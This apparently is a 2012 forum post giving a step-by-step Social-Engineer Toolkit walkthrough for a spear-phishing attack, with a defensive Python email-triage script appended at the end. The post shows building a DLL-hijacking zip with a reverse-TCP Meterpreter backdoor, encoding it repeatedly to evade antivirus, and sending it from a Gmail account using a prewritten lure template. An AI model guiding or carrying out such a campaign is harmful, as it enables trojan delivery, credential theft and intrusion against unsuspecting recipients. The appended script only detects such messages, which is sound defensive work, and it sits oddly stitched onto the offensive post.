23 set: configuring email spoofing
Posted 2012-8-6 17:12:10
Edit the SET config file and change SENDMAIL=OFF to SENDMAIL=ON.
Install the mailer (sendmail):

    root@Dis9Team:/pen/set# apt-get install sendmail

Start SET:

    root@Dis9Team:/pen/set# ./set

Choose 1: 1) Social-Engineering Attacks

Choose 1: Spear-Phishing Attack Vectors
Three options:

    1) Perform a Mass Email Attack
    2) Create a FileFormat Payload
    3) Create a Social-Engineering Template
Choose 1: 1) Perform a Mass Email Attack

Then choose the exploit method:

    1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
    2) SET Custom Written Document UNC LM SMB Capture Attack
    3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
    4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
    5) Adobe Flash Player "Button" Remote Code Execution
    6) Adobe CoolType SING Table "uniqueName" Overflow
    7) Adobe Flash Player "newfunction" Invalid Pointer Use
    8) Adobe Collab.collectEmailInfo Buffer Overflow
    9) Adobe Collab.getIcon Buffer Overflow
    10) Adobe JBIG2Decode Memory Corruption Exploit
    11) Adobe PDF Embedded EXE Social Engineering
    12) Adobe util.printf() Buffer Overflow
    13) Custom EXE to VBA (sent via RAR) (RAR required)
    14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
    15) Adobe PDF Embedded EXE Social Engineering (NOJS)
    16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
    17) Apple QuickTime PICT PnSize Buffer Overflow
    18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
    19) Adobe Reader u3D Memory Corruption Vulnerability
Most of these target PDF readers; we'll take the DLL hijacking one: 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
After pressing Enter, choose the backdoor: 2) Windows Reverse_TCP Meterpreter
Encoding the backdoor to evade AV:
    set:payloads>2
    Below is a list of encodings to try and bypass AV.
    Select one of the below, 'backdoored executable' is typically the best.

       1) avoid_utf8_tolower (Normal)
       2) shikata_ga_nai (Very Good)
       3) alpha_mixed (Normal)
       4) alpha_upper (Normal)
       5) call4_dword_xor (Normal)
       6) countdown (Normal)
       7) fnstenv_mov (Normal)
       8) jmp_call_additive (Normal)
       9) nonalpha (Normal)
      10) nonupper (Normal)
      11) unicode_mixed (Normal)
      12) unicode_upper (Normal)
      13) alpha2 (Normal)
      14) No Encoding (None)
      15) Multi-Encoder (Excellent)
      16) Backdoored Executable (BEST)

    set:encoding>
Choose 2:
    set:encoding>2
    set:payloads> PORT of the listener [443]:9874
    [-] Encoding the payload 4 times to get around pesky Anti-Virus. [-]
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
Next, choose the DLL hijacking target application:
    1. Windows Address Book (Universal)
    2. Microsoft Help and Support Center
    3. wscript.exe (XP)
    4. Microsoft Office PowerPoint 2007
    5. Microsoft Group Converter
    6. Safari v5.0.1
    7. Firefox <= 3.6.8
    8. Microsoft PowerPoint 2010
    9. Microsoft PowerPoint 2007
    10. Microsoft Visio 2010
    11. Microsoft Word 2007
    12. Microsoft Powerpoint 2007
    13. Microsoft Windows Media Encoder 9
    14. Windows 7 and Vista Backup Utility
    15. EnCase
    16. IBM Rational License Key Administrator
    17. Microsoft RDP
Choose 3, the most widespread one: 3. wscript.exe (XP)

After pressing Enter:
Enter the trojan's file name:
    set:webattack:dll_hijacking> Enter the filename for the attack (example:openthis) [openthis]:test

    Do you want to use a zipfile or rar file. Problem with zip
    is they will have to extract the files first, you can't just
    open the file from inside the zip. Rar does not have this
    restriction and is more reliable

    1. Rar File
    2. Zip File

    set:webattack:dll_hijacking> [rar]:2                      # choose ZIP packaging
    [-] This may take a few to load MSF...
    [-] Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.
    [-] Sendmail can take up to three minutes to start FYI.
    [*] Sendmail is set to ON
    set:phishing> Start Sendmail? [yes|no]:yes                # start the mailer
    [-] NOTE: Sendmail can take 3-5 minutes to start.
    * Starting Mail Transport Agent (MTA) sendmail hostname: Name or service not known
    hostname: Name or service not known
    * MTA is already running.
    [-] As an added bonus, use the file-format creator in SET to create your attachment.

    Right now the attachment will be imported with filename of 'template.whatever'

    Do you want to rename the file?

    example Enter the new filename: moo.pdf

    1. Keep the filename, I don't care.                       # choose the default
    2. Rename the file, I want to be cool.

    set:phishing>1
    [*] Keeping the filename and moving on.

    Social Engineer Toolkit Mass E-Mailer

    There are two options on the mass e-mailer, the first would
    be to send an email to one individual person. The second option
    will allow you to import a list and send it to as many people as
    you want within that list.

    What do you want to do:

    1. E-Mail Attack Single Email Address                     # email configuration
    2. E-Mail Attack Mass Mailer

    99. Return to main menu.

    set:phishing>1

    Do you want to use a predefined template or craft
    a one time email template.

    1. Pre-Defined Template                                   # use a predefined template
    2. One-Time Use Email Template

    set:phishing>1
    [-] Available templates:
    1: Strange internet usage from your computer
    2: Status Report
    3: Have you seen this?
    4: New Update
    5: How long has it been?
    6: Computer Issue
    7: Baby Pics
    8: hi brk
    9: Dan Brown's Angels & Demons
    10: WOAAAA!!!!!!!!!! This is crazy...
    set:phishing>2                                            # choose the email body
    set:phishing> Send email to:blackrootkit@gmail.com        # recipient

    1. Use a gmail Account for your email attack.             # use your own Gmail
    2. Use your own server or open relay

    set:phishing>1
    set:phishing> Your gmail email address:brkhacked@gmail.com   # sending account
    Email password:                                           # sending password (not echoed)
    set:phishing> Flag this message/s as high priority? [yes|no]:yes
Then it is sent, trojan and all.

Video to follow later.
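A receiving-side triage check for the kind of message this procedure produces (an added example, not SET's or the poster's code). It parses a constructed sample whose From: claims gmail.com but whose envelope sender and SPF result come from a different relay, flags the high-priority header, and opens the zip attachment to see whether a DLL was packed next to the lure file. The relay domain, Authentication-Results text, the assumption that "high priority" maps to X-Priority: 1, and the DLL name are all constructed placeholders.

```python
import io
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage
from email.utils import parseaddr

RISKY_IN_ARCHIVE = (".dll", ".exe", ".scr")


def archive_findings(data: bytes) -> list[str]:
    """Flag a zip that carries a DLL/EXE next to the lure file (the DLL-hijack pattern)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = [n.lower() for n in zf.namelist()]
    except zipfile.BadZipFile:
        return ["attachment-not-a-zip"]
    return [f"zip-contains-{n}" for n in names if n.endswith(RISKY_IN_ARCHIVE)]


def assess(raw: bytes) -> list[str]:
    """Return the spoofing / attachment indicators found in one raw RFC 822 message."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    from_dom = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    rp_dom = parseaddr(msg.get("Return-Path", ""))[1].rpartition("@")[2].lower()
    if rp_dom and rp_dom != from_dom:              # envelope sender is not the claimed domain
        findings.append("envelope-from-mismatch")
    if "spf=pass" not in msg.get("Authentication-Results", "").lower():
        findings.append("spf-not-pass")            # a relay sending "as" gmail.com cannot pass SPF
    if msg.get("X-Priority", "").startswith("1"):  # assumed mapping of the "high priority" flag
        findings.append("high-priority-flag")
    for part in msg.iter_attachments():
        if (part.get_filename() or "").lower().endswith(".zip"):
            findings.extend(archive_findings(part.get_payload(decode=True)))
    return findings


def constructed_sample() -> bytes:
    """Constructed message: the page's addresses, placeholder relay values, a fake zip."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as zf:
        zf.writestr("test.wsf", "<job></job>")         # lure file, named after the page's 'test'
        zf.writestr("payload.dll", b"MZ placeholder")  # placeholder DLL name, not SET's
    m = EmailMessage()
    m["From"] = "brkhacked@gmail.com"
    m["To"] = "blackrootkit@gmail.com"
    m["Return-Path"] = "<root@relay.invalid>"          # as the receiving MTA would record it
    m["Authentication-Results"] = "mx.invalid; spf=fail smtp.mailfrom=relay.invalid"
    m["X-Priority"] = "1 (Highest)"
    m["Subject"] = "Status Report"
    m.set_content("see attached")
    m.add_attachment(zbuf.getvalue(), maintype="application", subtype="zip", filename="test.zip")
    return m.as_bytes()
```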